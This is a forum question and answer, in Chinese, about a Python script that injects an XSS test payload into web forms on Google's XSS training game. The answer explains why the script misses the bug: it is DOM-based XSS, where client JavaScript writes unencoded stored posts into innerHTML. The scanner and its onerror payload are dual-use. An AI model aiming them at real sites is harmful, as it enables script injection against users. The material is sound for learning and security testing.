如何提交表单(包含文本区域和输入字段)python进行XSS攻击?



我一直在学习XSS和为XSS构建的谷歌游戏

http://www.xss-game.appspot.com/level2/frame

我已经手动找到了这一关的解法（把脚本包在图像标签里），但用下面的 Python 代码却检测不到这个漏洞

from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup

session = HTMLSession()

def retrieve_all_forms(url):
    """Fetch *url* with the shared session and return every ``<form>`` tag.

    Args:
        url: Page to download.

    Returns:
        A list of bs4 ``<form>`` elements; empty when the page has none.
    """
    response = session.get(url)
    document = BeautifulSoup(response.html.html, "html.parser")
    return document.find_all("form")


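def retrieve_form_details(form):
    """Describe a parsed ``<form>``: its action, method and form controls.

    Args:
        form: A bs4 ``<form>`` element.

    Returns:
        A dict with keys ``action`` (the raw action attribute, ``""`` when
        absent), ``request_method`` (lower-cased, defaults to ``"get"``) and
        ``inputs``, a list of ``{"type", "name", "value"}`` dicts, one per
        ``<input>`` and ``<textarea>`` in document order. ``name`` is ``None``
        for an unnamed control.
    """
    details = {
        # A missing action means "submit to the current page"; default to ""
        # rather than calling .lower() on None. The action is kept as written
        # because URL paths are case-sensitive.
        "action": form.attrs.get("action", ""),
        # HTTP method names are case-insensitive, so lower-casing is safe.
        "request_method": form.attrs.get("method", "get").lower(),
    }
    controls = []
    for tag in form.find_all("input"):
        controls.append({
            "type": tag.attrs.get("type", "text"),
            "name": tag.attrs.get("name"),
            "value": tag.attrs.get("value", ""),
        })
    for tag in form.find_all("textarea"):
        controls.append({
            "type": tag.attrs.get("type", "text"),
            "name": tag.attrs.get("name"),
            # A <textarea> has no value attribute; its initial value is its
            # text content.
            "value": tag.get_text(),
        })
    details["inputs"] = controls
    return details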


def payload_insulation(form, payload):
    """Write *payload* into the ``value`` of every non-hidden, non-submit control.

    Each control that is rewritten is printed first, exactly as the original
    did. The dict is modified in place.

    Args:
        form: Dict produced by ``retrieve_form_details``.
        payload: String stored as the ``value`` of each eligible control.

    Returns:
        The same *form* dict, for chaining.
    """
    untouched = ("hidden", "submit")
    for control in form["inputs"]:
        if control["type"] in untouched:
            continue
        print(control)
        control["value"] = payload
    return form

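def submit_form(url, form, payload):
    """Submit a filled-in form and report whether *payload* is echoed back.

    Args:
        url: Page the form was found on; the form's ``action`` is resolved
            relative to it.
        form: Dict from ``retrieve_form_details`` (usually after
            ``payload_insulation``).
        payload: String searched for, verbatim, in the response body.

    Returns:
        1 if the raw payload string occurs in the response text, else 0.
        This is a reflection check only: a hit does not mean the text is
        rendered as markup, and content that client-side JavaScript builds
        after the page loads (DOM-based rendering) is never visible here.

    Raises:
        ValueError: if the form's method is neither ``"get"`` nor ``"post"``
            (the original fell through to an UnboundLocalError on ``res``).
    """
    # Browsers never submit a control that has no name; skipping them also
    # avoids a None key in the request data.
    data = {tag["name"]: tag["value"] for tag in form["inputs"] if tag["name"]}
    print(data)
    # Send the request where the form points, not unconditionally to the page
    # it came from (urljoin returns *url* unchanged for an empty action).
    target = urljoin(url, form["action"])
    method = form["request_method"]
    if method == "post":
        res = session.post(target, data=data)
    elif method == "get":
        res = session.get(target, params=data)
    else:
        raise ValueError(f"unsupported form method: {method!r}")
    return 1 if payload in res.text else 0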


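def form_xss(url, payload):
    """Run the reflection check against every form found on *url*.

    Args:
        url: Page to scan.
        payload: String written into each visible control and then searched
            for in the response body.

    Returns:
        A list of ``(payload, True)`` tuples, one per form whose response
        echoed the payload; forms that did not echo it are not recorded.
        Only the HTTP response body is inspected, so markup produced by
        client-side JavaScript (DOM-based XSS, as in the answer below) does
        not show up here.
    """
    results = []
    for form in retrieve_all_forms(url):
        details = payload_insulation(retrieve_form_details(form), payload)
        if submit_form(url, details, payload) == 1:
            results.append((payload, True))
    return results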

    
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))

我一直试图通过post发送数据,但img标记没有出现在响应中。有人能告诉我这段代码缺少什么吗?谢谢



使用JavaScript从本地存储读取帖子,如页面源中所示:

  // Rebuilds #post-container by concatenating HTML strings and assigning them
  // to innerHTML. posts[i].message is inserted without any encoding, so the
  // browser parses whatever markup it contains: the HTML is produced on the
  // client, which is why it never appears in the server's response.
  // Mitigation: build the elements with createElement/textContent instead of
  // string concatenation into innerHTML.
  function displayPosts() {
    var containerEl = document.getElementById("post-container");
    containerEl.innerHTML = "";

    // Source of the post list; per the answer above it reads from local
    // storage (DB is not shown here).
    var posts = DB.getPosts();
    for (var i=0; i<posts.length; i++) {
      var html = '<table class="message"> <tr> <td valign=top> '
        + '<img src="/static/level2_icon.png"> </td> <td valign=top '
        + ' class="message-container"> <div class="shim"></div>';

      html += '<b>You</b>';
      html += '<span class="date">' + new Date(posts[i].date) + '</span>';
      // Sink: the raw message is spliced into the HTML string. Note the closing
      // tag is written as "</blockquote" with no '>'.
      html += "<blockquote>" + posts[i].message + "</blockquote";
      html += "</td></tr></table>"
      containerEl.innerHTML += html; 
    }
  }

因此这是一个基于 DOM 的 XSS：服务器响应中不会包含该标记，因为帖子是由浏览器端的 JavaScript 从本地存储读取并渲染的，只有在 JavaScript 运行之后才会出现。
